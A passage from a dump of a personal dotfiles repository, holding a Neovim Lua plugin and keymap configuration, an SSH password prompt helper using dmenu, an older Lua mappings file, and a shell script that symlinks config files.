Path.join(vscode_dir, \"package.json\")\n if Path.exists(package_json_file)\n then\n require(\"luasnip.loaders.from_vscode\").lazy_load({\n paths = vscode_dir\n })\n end\n end\n\n --maybe_load_vscode_snippets()\n require(\"luasnip.loaders.from_vscode\").lazy_load({ paths = { \"/home/maik/projects/ark-modules/.vscode\" } })\n cmp.setup {\n -- formatting = {\n -- fields = { \"kind\", \"abbr\", \"menu\" },\n -- format = function(entry, vim_item)\n -- local kind = require(\"lspkind\").cmp_format({ mode = \"symbol_text\", maxwidth = 50 })(entry,\n -- vim_item)\n -- local strings = vim.split(kind.kind, \"%s\", { trimempty = true })\n -- kind.kind = \" \" .. strings[1] .. \" \"\n -- kind.menu = \" (\" .. strings[2] .. 
\")\"\n --\n -- return kind\n -- end,\n -- },\n window = {\n completion = {\n border = 'shadow',\n winhighlight = \"Normal:Normal,FloatBorder:Visual,Search:None,CursorLine:Visual\",\n col_offset = -3,\n side_padding = 0,\n scrollbar = false\n },\n },\n snippet = {\n expand = function(args)\n luasnip.lsp_expand(args.body)\n end,\n },\n mapping = cmp.mapping.preset.insert {\n ['<C-d>'] = cmp.mapping.scroll_docs(-4),\n ['<C-f>'] = cmp.mapping.scroll_docs(4),\n ['<C-Space>'] = cmp.mapping.complete({}),\n ['<CR>'] = cmp.mapping.confirm {\n behavior = cmp.ConfirmBehavior.Replace,\n select = true,\n },\n ['<Tab>'] = cmp.mapping(function(fallback)\n if cmp.visible() then\n cmp.select_next_item()\n else\n fallback()\n end\n end, { 'i', 's' }),\n ['<S-Tab>'] = cmp.mapping(function(fallback)\n if cmp.visible() then\n cmp.select_prev_item()\n else\n fallback()\n end\n end, { 'i', 's' }),\n },\n sources = {\n { name = 'nvim_lsp', priority = 9 },\n { name = 'luasnip', priority = 1 },\n { name = 'nvim_lsp_signature_help' },\n { name = 'path' }\n },\n }\n vim.keymap.set({ 'i', 's' }, '<C-k>',\n function()\n if luasnip.expand_or_jumpable() then\n luasnip.expand_or_jump()\n end\n end,\n { desc = 'Snippet next' })\n\n vim.keymap.set({ 'i', 's' }, '<C-j>',\n function()\n luasnip.jump(-1)\n end,\n { desc = 'Snippet prev' })\n end\n },\n\n {\n 'nvim-telescope/telescope.nvim',\n dependencies = {\n { 'nvim-lua/plenary.nvim' },\n { 'nvim-telescope/telescope-ui-select.nvim' },\n {\n 'nvim-telescope/telescope-fzf-native.nvim',\n build =\n 'cmake -S. -Bbuild -DCMAKE_BUILD_TYPE=Release && cmake --build build --config Release && cmake --install build --prefix build'\n },\n { 'nvim-telescope/telescope-fzy-native.nvim' },\n { 'olimorris/persisted.nvim' },\n { 'benfowler/telescope-luasnip.nvim' },\n { 'L3MON4D3/LuaSnip' }\n\n\n },\n config = function()\n local fzf_opts = {\n fuzzy = true, -- false will only do exact matching\n override_generic_sorter = true, -- override the generic sorter\n override_file_sorter = true, -- override the file sorter\n case_mode = \"smart_case\", -- or \"ignore_case\" or \"respect_case\"\n }\n require(\"telescope\").setup {\n pickers = {\n find_files = {\n find_command = {\n 'rg', '--ignore', '-L', '--hidden', '--files'\n }\n }\n },\n extensions = {\n [\"ui-select\"] = {\n require(\"telescope.themes\").get_dropdown {\n }\n },\n fzf = fzf_opts,\n },\n }\n\n require(\"telescope\").load_extension(\"ui-select\")\n require('telescope').load_extension('fzf')\n require('telescope').load_extension('persisted')\n require('telescope').load_extension('luasnip')\n\n local ts = require('telescope.builtin')\n vim.keymap.set('n', '<leader>sf', ts.find_files, { desc = '[S]earch [F]iles' })\n vim.keymap.set('n', '<leader>sr', ts.resume, { desc = 'Search Resume' })\n vim.keymap.set('n', '<leader>sh', ts.help_tags, { desc = '[S]earch [H]elp' })\n vim.keymap.set('n', '<leader>sw', ts.grep_string, { desc = '[S]earch current [W]ord' })\n vim.keymap.set('n', '<leader>sg', ts.live_grep, { desc = '[S]earch by [G]rep' })\n vim.keymap.set('n', '<leader>le', ts.diagnostics, { desc = '[S]earch [D]iagnostics' })\n vim.keymap.set('n', '<leader>vt', ts.colorscheme, { desc = 'Theme' })\n vim.keymap.set('n', '<leader>vk', ts.keymaps, { desc = 'keymap' })\n vim.keymap.set('n', '<leader>ss', ts.current_buffer_fuzzy_find, { desc = 'Search in File' })\n vim.keymap.set('n', '<leader>vh', ts.help_tags, { desc = 'Help tags' })\n vim.keymap.set('n', '<leader>vup', require('lazy').show, { desc = 'Lazy' })\n vim.keymap.set('n', 
'<leader>pp', ':Telescope persisted<CR>', { desc = 'Find session' })\n vim.keymap.set('n', '<leader>vul', ':Mason<CR>', { desc = 'Mason LSP' })\n end\n },\n\n {\n 'nvim-lualine/lualine.nvim',\n dependencies = { 'nvim-tree/nvim-web-devicons', 'SmiteshP/nvim-navic' },\n config = function()\n local navic = require(\"nvim-navic\")\n require('lualine').setup({\n sections = {\n lualine_c = {\n { navic.get_location, cond = navic.is_available },\n }\n }\n })\n end\n },\n {\n 'kdheepak/tabline.nvim',\n config = function()\n require 'tabline'.setup {\n options = {\n show_tabs_only = true,\n show_tabs_always = true\n }\n }\n vim.cmd [[\n set guioptions-=e \" Use showtabline in gui vim\n ]]\n end,\n dependencies = { 'nvim-lualine/lualine.nvim', 'nvim-tree/nvim-web-devicons' }\n },\n {\n \"nvim-treesitter/nvim-treesitter\",\n build = \":TSUpdate\",\n event = { \"BufReadPost\" },\n dependencies = { 'p00f/nvim-ts-rainbow' },\n config = function()\n require 'nvim-treesitter.configs'.setup {\n -- A list of parser names, or \"all\"\n ensure_installed = { \"c\", \"lua\", \"rust\", \"toml\", \"help\" },\n sync_install = false,\n highlight = {\n enable = true,\n },\n rainbow = {\n enable = true,\n extended_mode = true,\n }\n }\n end\n },\n {\n \"olimorris/persisted.nvim\",\n event = { 'VeryLazy' },\n config = function()\n require(\"persisted\").setup({\n --autoload = true,\n allowed_dirs = {\n '~/projects',\n '~/.config/nvim'\n },\n })\n vim.keymap.set('n', '<leader>ps', ':SessionLoad<CR>:SessionStart<CR>', { desc = 'Load Session' })\n vim.keymap.set('n', '<leader>pc', ':SessionStart<CR>', { desc = 'Create Session' })\n end,\n },\n {\n \"windwp/nvim-autopairs\",\n config = function()\n require(\"nvim-autopairs\").setup {}\n local npairs = require('nvim-autopairs')\n local Rule = require('nvim-autopairs.rule')\n npairs.add_rule(Rule(\"<\", \">\"))\n end\n },\n ({\n \"kylechui/nvim-surround\",\n config = function()\n require(\"nvim-surround\").setup({})\n end\n }),\n {\n 'TimUntersberger/neogit',\n dependencies = { 'nvim-lua/plenary.nvim', 'sindrets/diffview.nvim' },\n config = function()\n local neogit = require('neogit')\n neogit.setup {\n integrations = {\n diffview = true\n },\n disable_commit_confirmation = true,\n }\n\n\n vim.keymap.set('n', '<leader>gs', neogit.open, { desc = 'Git status' })\n end\n },\n { 'sindrets/diffview.nvim', dependencies = { 'nvim-lua/plenary.nvim' } },\n {\n 'ibhagwan/fzf-lua',\n -- optional for icon support\n dependencies = { 'nvim-tree/nvim-web-devicons' }\n },\n\n --{ 'chaoren/vim-wordmotion' },\n {\n 'nvim-tree/nvim-tree.lua',\n dependencies = {\n 'nvim-tree/nvim-web-devicons', -- optional, for file icons\n },\n config = function()\n require('nvim-tree').setup({\n\n })\n vim.keymap.set(\"n\", \"<leader>ft\", ':NvimTreeFindFileToggle<CR>', { desc = 'File Explorer' })\n end\n },\n {\n \"ggandor/leap.nvim\",\n config = function()\n local leap = require(\"leap\")\n leap.setup({\n })\n vim.keymap.set('n', 'r', '<Plug>(leap-forward-to)', { desc = 'Leap forward' })\n vim.keymap.set('n', 'R', '<Plug>(leap-backward-to)', { desc = 'Leap backward' })\n end,\n },\n {\n 'lukas-reineke/indent-blankline.nvim',\n config = function()\n require(\"indent_blankline\").setup {}\n end\n },\n {\n 'numToStr/Comment.nvim',\n config = function()\n require('Comment').setup()\n end\n },\n {\n 'numToStr/FTerm.nvim',\n config = function()\n require 'FTerm'.setup({\n border = 'double',\n dimensions = {\n height = 0.9,\n width = 0.9,\n },\n cmd = 'zsh'\n })\n vim.keymap.set('n', '<A-i>', '<CMD>lua 
require(\"FTerm\").toggle()<CR>')\n      vim.keymap.set('t', '<A-i>', '<C-\\\\><C-n><CMD>lua require(\"FTerm\").toggle()<CR>')\n      local fterm = require(\"FTerm\")\n\n\n      local lazygit = fterm:new({\n        ft = 'fterm_lazygit',\n        cmd = 'lazygit',\n      })\n\n      vim.keymap.set('n', '<leader>gt', function() lazygit:toggle() end, { desc = 'Lazygit' })\n\n      local gitui = fterm:new({\n        ft = 'fterm_gitui',\n        cmd = 'gitui',\n      })\n\n      vim.keymap.set('n', '<leader>gf', function() gitui:toggle() end, { desc = 'Gitui' })\n    end\n  },\n  {\n    'glacambre/firenvim',\n    build = function() vim.fn['firenvim#install'](0) end\n  },\n  {\n    'tpope/vim-fugitive',\n    config = function()\n      vim.keymap.set('n', '<leader>gg', ':Git<CR>', { desc = 'Fugitive' })\n    end\n  },\n  {\n    'tpope/vim-rhubarb'\n  },\n  {\n    'kburdett/vim-nuuid'\n  },\n  -- {\n  --   'simrat39/rust-tools.nvim',\n  --   config = function()\n  --     local rt = require(\"rust-tools\")\n  --\n  --     rt.setup({\n  --       server = {\n  --         on_attach = function(_, bufnr)\n  --         end,\n  --       },\n  --     })\n  --   end\n  -- }\n  -- {\n  --   'rmagatti/auto-session',\n  --   config = function()\n  --     require(\"auto-session\").setup {\n  --     }\n  --   end\n  -- }\n}, {\n  install = {\n    colorscheme = { mycolorscheme }\n  }\n})\n\nvim.cmd.colorscheme(mycolorscheme)\n\nif vim.fn.exists(\"g:neovide\") == 1 then\n  vim.g.neovide_cursor_animation_length = 0.0\n  vim.g.neovide_confirm_quit = false\n  vim.g.neovide_refresh_rate = 120\nend\n" }, { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 31.25, "blob_id": "8ea514e0d11c248af6b5efb2b8281adf6a5da647", "content_id": "07718def7d6bde84e8c24fd8c752ef48648a45f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "no_license", "max_line_length": 62, "num_lines": 4, "path": "/penrose/scripts/unlock-ssh-helper.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Allow for the ssh-add script to be run on startup as part of\n# `unlock-ssh.sh`\necho | dmenu -p \"SSH Password: \" -P\n" }, { "alpha_fraction": 0.5556097626686096, "alphanum_fraction": 0.5565853714942932, "avg_line_length": 34.96491241455078, "blob_id": "c0e10033713decaea4edf61b6eea329d86b36090", "content_id": "75c2601742d3e127c7bf4fbe6cfe02f18f8f892a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 2050, "license_type": "no_license", "max_line_length": 98, "num_lines": 57, "path": "/nvim/oldconfig/lua/mappings.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local function map(mode, lhs, rhs, opts)\n\tlocal options = { noremap = true }\n\tif opts then\n\t\toptions = vim.tbl_extend(\"force\", options, opts)\n\tend\n\tvim.api.nvim_set_keymap(mode, lhs, rhs, options)\nend\n\nlocal opt = {}\nmap(\"n\", \"<C-t>t\", [[<Cmd> tabnew | term <CR>]], opt) -- term newtab\nmap(\"n\", \"<leader>fer\", [[<Cmd> lua require('plenary').reload_modules()<CR>]], opt) -- reload plenary modules\n\n-- COPY EVERYTHING --\nmap(\"n\", \"<C-a>\", [[ <Cmd> %y+<CR>]], opt)\n\n-- toggle numbers ---\nmap(\"n\", \"<leader>n\", [[ <Cmd> set nu!<CR>]], opt)\n\n-- toggle truezen.nvim's ataraxis and minimalist mode\nmap(\"n\", \"<leader>z\", [[ <Cmd> TZAtaraxis<CR>]], opt)\nmap(\"n\", \"<leader>m\", [[ <Cmd> TZMinimalist<CR>]], opt)\n\nfor i = 1, 9 do\n\tmap(\"n\", \"<leader>o\" .. i, i .. \"gt\", opt)\n\tmap(\"n\", \"<leader>om\" .. i, \":tabm\" .. i .. \"<CR>\", opt)\n\tmap(\"n\", \"<leader>\" .. i, \":\" .. 
i .. \"wincmd w<CR>\", opt)\nend\n\nmap(\"n\", \"<leader>od\", \":tabclose<CR>\", opt)\nmap(\"n\", \"<leader>oc\", \":tabnew<CR>:tabmove<CR>\", opt)\nmap(\"n\", \"<leader>sc\", \":noh<CR>\", opt)\nmap(\"i\", \"<C-s>\", \"<esc>:w<CR>\", opt)\nmap(\"n\", \"<C-s>\", \":w<CR>\", opt)\nmap(\"n\", \"<leader>gs\", \":Git<CR>\", opt)\n\nmap(\"n\", \"<leader>ls\", \":FindSymbols<CR>\", opt)\nmap(\"n\", \"<leader>lf\", \":FindFunctions<CR>\", opt)\nmap(\"n\", \"<leader>li\", \":FindImpls<CR>\", opt)\n\nmap(\"n\", \"<leader>y\", '\"+y', opt)\nmap(\"v\", \"<leader>y\", '\"+y', opt)\n\n--map(\"n\", \"<Leader>ca\", [[<Cmd>lua require('telescope.builtin').lsp_code_actions()<CR>]], opt)\nmap(\"n\", \"<Leader>ca\", \":CodeActionMenu<CR>\", opt)\n--map(\"n\", \"<leader>ca\", \":Lspsaga code_action<CR>\", opt)\n--map(\"v\", \"<leader>ca\", \":Lspsaga range code_action<CR>\", opt)\n--map(\"n\", \"gp\", \":Lspsaga preview_definition<CR>\", opt)\n\nmap(\"n\", \"<leader>el\", \":TroubleToggle<CR>\", opt)\nmap(\"n\", \"<leader>ee\", \":Lspsaga show_line_diagnostics<CR>\", opt)\nmap(\"n\", \"<leader>gc\", \":Git commit -v -q<CR>\", opt)\n\nmap(\"n\", \"r\", \"<Plug>(leap-forward-to)\", opt)\nmap(\"n\", \"R\", \"<Plug>(leap-backward-to)\", opt)\n--vim.keymap.set(\"n\", \"r\", require(\"leap\").leap-forward-to, {silent = true})\n" }, { "alpha_fraction": 0.6336206793785095, "alphanum_fraction": 0.6434729099273682, "avg_line_length": 38.585365295410156, "blob_id": "56db6d7d36036724f8c534aee9565f9a7e13b410", "content_id": "5f8a708848d36d4d9cd0b7e5651efb2d9d893fb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1624, "license_type": "no_license", "max_line_length": 86, "num_lines": 41, "path": "/config.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "ln -s -f \"$(pwd)/zsh/.zshrc\" ~/.zshrc\nln -s -f \"$(pwd)/zsh/.zshenv\" ~/.zshenv\nln -s -f \"$(pwd)/spacemacs/.spacemacs\" ~/.spacemacs\nmkdir -p ~/.config/nvim\nln -s -f \"$(pwd)/nvim/.config/nvim/init.vim\" ~/.config/nvim/init.vim\nln -s -f \"$(pwd)/nvim/.config/nvim/coc-settings.json\" ~/.config/nvim/coc-settings.json\nln -s -f \"$(pwd)/tmux/.tmux.conf\" ~/.tmux.conf\nmkdir -p ~/.config/tmux\nln -s -f \"$(pwd)/tmux/solarized.theme\" ~/.config/tmux/solarized.theme\nln -s -f \"$(pwd)/vim/.vimrc\" ~/.vimrc\nmkdir -p ~/.i3\nln -s -f \"$(pwd)/i3/.i3/config\" ~/.i3/config\nln -s -f \"$(pwd)/X/.Xresources\" ~/.Xresources\nln -s -f \"$(pwd)/X/.xinitrc\" ~/.xinitrc\n\nmkdir -p ~/.config/bspwm\nln -s -f \"$(pwd)/bspwm/.config/bspwm/bspwmrc\" ~/.config/bspwm/bspwmrc\nmkdir -p ~/.config/sxhkd\nln -s -f \"$(pwd)/bspwm/.config/sxhkd/sxhkdrc\" ~/.config/sxhkd/sxhkdrc\nln -s -f \"$(pwd)/compton/compton.conf\" ~/compton.conf\n\nmkdir -p ~/.config/polybar\nln -s -f \"$(pwd)/polybar/.config/polybar/config\" ~/.config/polybar/config\ncp -rsf \"$(pwd)/.IntelliJIdea2017.2\" ~/.IntelliJIdea2017.2\nln -s -f \"$(pwd)/ideavimrc/.ideavimrc\" ~/.ideavimrc\n\nmkdir -p ~/.config/fish\nln -s -f \"$(pwd)/fish/.config/fish/config.fish\" ~/.config/fish/config.fish\nln -s -f \"$(pwd)/fish/.config/fish/fishfile\" ~/.config/fish/fishfile\nln -s -f \"$(pwd)/fish/.config/fish/functions\" ~/.config/fish/functions\n\nmkdir -p ~/.config/kitty\nln -s -f \"$(pwd)/kitty/.config/kitty/kitty.conf\" ~/.config/kitty/kitty.conf\n\nln -s -f -d \"$(pwd)/awesome\" ~/.config\n\nln -s -f -d \"$(pwd)/blender\" ~/.config\n\nln -s -f -d \"$(pwd)/nvim\" ~/.config/nvim\n\nln -s -f \"$(pwd)/mouse/gpro.conf\" /etc/X11/xorg.conf.d/gpro.conf\n\n" } ]
33
ras592/blog-mini
https://github.com/ras592/blog-mini
66532711497cea25527a0d234e864aedd99628e0
9b35ac8358267ad6b8165224fae27c259f146aa6
d2da3e05f5dc1cea5c0c574ce0980433c11a05f8
refs/heads/master
2021-01-10T05:40:50.108521
2016-03-24T21:43:28
2016-03-24T21:43:28
54,444,458
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.574018120765686, "alphanum_fraction": 0.5763421058654785, "avg_line_length": 29.735713958740234, "blob_id": "785a1358e94d23a930fdd3efd0c04876ec4c8211", "content_id": "5668f42b706cbae3ff9e51eff9eeeab6fb7fb52e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4303, "license_type": "no_license", "max_line_length": 91, "num_lines": 140, "path": "/app.py", "repo_name": "ras592/blog-mini", "src_encoding": "UTF-8", "text": "#!venv/bin/python\nimport web, os, json\nfrom jinja2 import Environment, FileSystemLoader\nimport pymongo\nfrom bson.objectid import ObjectId\n\nurls = (\n '/', 'index',\n '/post', 'Post',\n '/postDel', 'PostDel'\n)\n\napp = web.application(urls, globals())\n\nconnection = pymongo.MongoClient('localhost', 27017)\ndb = connection.test\n\nglobals = {}\njinja_env = Environment(\n loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')),\n extensions=[],\n )\njinja_env.globals.update(globals)\n\ndef render_template(template_name, **context):\n global jinja_env\n\n #jinja_env.update_template_context(context)\n return jinja_env.get_template(template_name).render(context)\n\ndef validate(post_id, post_title, post_body):\n \"\"\"Gives back a valid dictionary to be converted into JSON.\n Parameters:\n post_id: ObjectID object\n post_title: String\n post_body: String\n Returns:\n dict: Returns the string value of ObjectID, string postTitle, and string postBody.\n \"\"\"\n return {\n \"postId\": str(post_id),\n \"postTitle\": post_title,\n \"postBody\": post_body\n }\n\nclass index:\n def GET(self):\n \"\"\"Handles GET method for index route.\n Renders the template index.html.\n\n Returns:\n render_template: Renders index.html template.\n \"\"\"\n return render_template('index.html')\n\nclass Post:\n def GET(self):\n \"\"\"Handles GET method for post route.\n Uses the validate helper method to change the format of the dict to match client\n json keys.\n\n Returns:\n json: Returns JSON object with the keys: success and array of posts dictionary.\n \"\"\"\n try:\n posts = db.posts.find()\n posts = filter(lambda post:\n not None in (post.get('_id'), post.get('title'), post.get('body')),\n posts)\n posts = map(lambda post:\n validate(post.get('_id'), post.get('title'), post.get('body')),\n posts)\n except Exception as e:\n print e\n posts = []\n return json.dumps({\"status\": \"success\", \"posts\": posts})\n\n\n def POST(self):\n \"\"\"Handles POST method for post route.\n Validates the input from the user.\n Inserts the title and body values into MongoDB and gets the ObjectID\n for the entry.\n Uses the validate helper method to change the format of the dict to match client\n json keys.\n Handles exception for any MongoDB errors silently.\n\n Returns:\n json: Returns JSON object with the keys: success and valid_post dictionary.\n \"\"\"\n inp = web.input()\n title, body = inp.get('postTitle'), inp.get('postBody')\n if None in (title, body):\n return json.dumps({'status': 'error'})\n if len(title) == 0 or len(body) == 0:\n return json.dumps({'status': 'error'})\n post = {\n 'title': title,\n 'body': body\n }\n\n try:\n post_id = db.posts.insert_one(post).inserted_id\n except Exception as e:\n print e\n return json.dumps({'status': 'error'})\n valid_post = validate(post_id, title, body)\n return json.dumps({'status': 'success', 'post': valid_post})\n\n\nclass PostDel:\n def POST(self):\n \"\"\"Handles POST method for postDel route.\n Validates the input from the user.\n post_id value is 
used to remove a document from MongoDB.\n Handles exception for any MongoDB errors silently.\n\n Returns:\n json: Returns JSON object with the success message.\n \"\"\"\n inp = web.input()\n post_id = inp.get('postId')\n\n if post_id is None:\n return json.dumps({'status': 'error'})\n if len(post_id) == 0:\n return json.dumps({'status': 'error'})\n\n try:\n result = db.posts.delete_one({'_id': ObjectId(post_id)})\n if result.deleted_count != 1:\n raise Exception('One document was not deleted.')\n except Exception as e:\n print e\n return json.dumps({'status': 'error'})\n return json.dumps({'status': 'success'})\n\n\nif __name__ == \"__main__\":\n app.run()\n" }, { "alpha_fraction": 0.4844863712787628, "alphanum_fraction": 0.48553457856178284, "avg_line_length": 28.627328872680664, "blob_id": "b437672dbc1797a80e3d90f9026ab8757d79ca75", "content_id": "d2dbf4d6cbe0f5469dcdd687031cf62d40a2f192", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4770, "license_type": "no_license", "max_line_length": 91, "num_lines": 161, "path": "/static/js/blog.js", "repo_name": "ras592/blog-mini", "src_encoding": "UTF-8", "text": "var blog = (function() {\n var posts = [];\n\n // cache DOM\n var $container = $('.container');\n var $feed = $('#feed');\n var $blogFormButton = $('#blogForm button');\n var $postTitle = $('#postTitle');\n var $postBody = $('#postBody');\n var $postTitleForm = $('.postTitle');\n var $postBodyForm = $('.postBody');\n var $postTitleError = $('#postTitleError');\n var $postBodyError = $('#postBodyError');\n var template = $feed.find('#postTemplate').html();\n\n var uploadMsg = [\n '<div class=\"flash alert alert-dismissible alert-success\" role=\"alert\">',\n '<strong>Successfully uploaded!</strong>',\n '<button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\">',\n '<span aria-hidden=\"true\">&times;</span>',\n '</button>',\n '</div>'\n ].join(\"\");\n\n var removeMsg = [\n '<div class=\"flash alert alert-dismissible alert-success\" role=\"alert\">',\n '<strong>Successfully removed!</strong>',\n '<button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\">',\n '<span aria-hidden=\"true\">&times;</span>',\n '</button>',\n '</div>'\n ].join(\"\");\n\n // bind events\n $blogFormButton.on('click', addToFeed);\n $feed.delegate('.removeIcon', 'click', deleteFromFeed);\n $postTitle.focus(_removePostTitleError);\n $postBody.focus(_removePostBodyError);\n\n _render();\n\n function _render() {\n $feed.html(Mustache.render(template, {posts: posts}));\n }\n\n function _clearInputs() {\n $postTitle.val('');\n $postBody.val('');\n }\n\n function _removePostTitleError() {\n $postTitleError.hide();\n }\n\n function _removePostBodyError() {\n $postBodyError.hide();\n }\n\n function _addToPosts(postId, postTitle, postBody) {\n posts.push({\"postId\": postId, \"postTitle\": postTitle, \"postBody\": postBody});\n _render();\n }\n\n function init() {\n // make request for JSON\n var url = \"./post\",\n args = {},\n callback = function (resp) {\n resp = $.parseJSON(resp);\n resp = resp.posts;\n resp.forEach( function(post) {\n _addToPosts(post.postId, post.postTitle, post.postBody);\n });\n };\n $.get(url, args, callback);\n }\n\n function addToFeed(value) {\n var post;\n var errors = [];\n if(value.hasOwnProperty(\"postTitle\") && value.hasOwnProperty(\"postBody\")) {\n post = {\"postTitle\": value.postTitle, \"postBody\": value.postBody};\n } else {\n post = {\n \"postTitle\": 
$.trim($postTitle.val()),\n \"postBody\": $.trim($postBody.val())\n };\n }\n\n if(post.postTitle.length === 0) {\n // title wasn't given\n $postTitleError.show();\n errors.push('No title');\n }\n\n if(post.postBody.length === 0) {\n // body wasn't given\n $postBodyError.show();\n errors.push('No body');\n }\n\n console.log(errors.length);\n\n if(errors.length === 0) {\n var url = \"./post\",\n args = {\n \"postTitle\": post.postTitle,\n \"postBody\": post.postBody\n },\n callback = function (resp) {\n $container.prepend(uploadMsg);\n resp = $.parseJSON(resp);\n resp = resp.post;\n _addToPosts(resp.postId, resp.postTitle, resp.postBody);\n _clearInputs();\n };\n $.post(url, args, callback);\n\t\t} else {\n\t\t\terrors.forEach(function(e) {\n\t\t\t\tconsole.log(e);\n\t\t\t});\n\t\t}\n }\n\n function deleteFromFeed(e) {\n // either an index value or an event object\n var i, postId;\n if(typeof e === \"number\") {\n i = e;\n if(i >= 0 && i < posts.length) {\n postId = posts[i].postId;\n } else {\n return;\n }\n } else {\n var $remove = $(e.target).closest('.post-container');\n postId = $remove.attr('data-post_id');\n i = $feed.find('.post').index($remove);\n }\n\n var url = \"./postDel\",\n args = {\n \"postId\": postId,\n },\n callback = function (resp) {\n console.log(resp);\n $container.prepend(removeMsg);\n posts.splice(i, 1);\n _render();\n };\n $.post(url, args, callback);\n }\n\n return {\n init: init,\n addToFeed: addToFeed,\n deleteFromFeed: deleteFromFeed\n };\n})();\n\nblog.init();\n" }, { "alpha_fraction": 0.4736842215061188, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 13.25, "blob_id": "f74bfe07a3cbcb34c8025b81f8a524b29bd49aa9", "content_id": "646a2ecf84cd1f102d5e0f24a6d322fcefdb6945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 57, "license_type": "no_license", "max_line_length": 16, "num_lines": 4, "path": "/requirements.txt", "repo_name": "ras592/blog-mini", "src_encoding": "UTF-8", "text": "Jinja2==2.8\nMarkupSafe==0.23\npymongo==3.2.2\nweb.py==0.37\n" } ]
3
Hotchmoney/NeuralNets-Crime
https://github.com/Hotchmoney/NeuralNets-Crime
3c530dceb2d61ab435fcaf8726f5edbbaad5e095
793f786fa8b6904dd860e632f899a668b81c56c1
3d954220e07c76a081238549715108916f41d9ec
refs/heads/master
2021-05-01T14:31:52.319130
2018-02-11T05:18:09
2018-02-11T05:18:09
121,087,674
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.671345055103302, "alphanum_fraction": 0.686549723148346, "avg_line_length": 20.923076629638672, "blob_id": "46a8b64c03a8df920334cd1477ca43f3a23a4bc2", "content_id": "68115c44a71b808808f83320d42686e303d88f32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 72, "num_lines": 39, "path": "/Project/VisualizeLocation.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import numpy\nfrom keras.models import load_model\nfrom keras.utils.visualize_util import plot\n\nmodel = load_model('my_modeltest.h5')\n\nnumpy.random.seed(7)\n\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\nToUseX = dataframe[:,9:11] #normalized latitude & longitude\n\n\ndef create_database(dataset,look_back=1):\n    dataX, dataY = [], []\n    for i in range(len(dataset)-look_back-1):\n        a= dataset[i:(i+look_back),:]\n        dataX.append(a)\n        dataY.append(dataset[i+look_back,:])\n    return numpy.array(dataX), numpy.array(dataY)\n\n\nlatmax = max(dataframe[:,7])\nlongmax = max(dataframe[:,8])\nlatmin = min(dataframe[:,7])\nlongmin = min(dataframe[:,8])\n\nprint(latmax)\nprint(longmax)\nprint(latmin)\nprint(longmin)\n\n#create_database returns (inputs, targets); only the inputs are needed here\ntoUse, _ = create_database(ToUseX,4)\ntoUse = numpy.reshape(toUse,(toUse.shape[0],4,2))\n\npredict = model.predict(toUse)\n\nfor x in predict:\n    print(x)\n" }, { "alpha_fraction": 0.722719132900238, "alphanum_fraction": 0.7465712428092957, "avg_line_length": 31.25, "blob_id": "fa761da8a73cc8bc0bf94463107cc135356c0abf", "content_id": "2bc1e7af98f8ade2f83b3a22ac4c0e53945b585b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1677, "license_type": "no_license", "max_line_length": 78, "num_lines": 52, "path": "/Project/PredictHoY.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import numpy\nimport matplotlib.pyplot as plt\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #length 1/3rd of the dataset\n\ntrain_main = dataframe[0:train_size,11:13]\ntest_main = dataframe[train_size:len(dataframe),11:13]\n\ndef create_database(dataset,look_back=1):\n    #3D arrays, len(dataset) X number of datapoints X features per datapoint\n    dataX = [] #datapoints are arrays containing last look_back crime types\n    dataY = [] #datapoints are the upcoming crime type\n\n    for i in range(len(dataset)-look_back-1):\n        dataX.append(dataset[i:(i+look_back),:])\n        dataY.append(dataset[i+look_back,:])\n\n    return numpy.array(dataX), numpy.array(dataY)\n\ntrainX_main, trainY_main = create_database(train_main,4)\ntestX_main, testY_main = create_database(test_main,4)\n\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],4,2))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],4,2))\n\n'''\nRun The Neural NET\n'''\n\nmodel = Sequential()\nmodel.add(LSTM(32,input_dim=2))\nmodel.add(Dense(2))\nmodel.compile(loss='mean_squared_error',optimizer='adam',metrics=['accuracy'])\nmodel.fit(trainX_main,trainY_main,nb_epoch=10,batch_size=10,verbose=2)\n\nscore = 
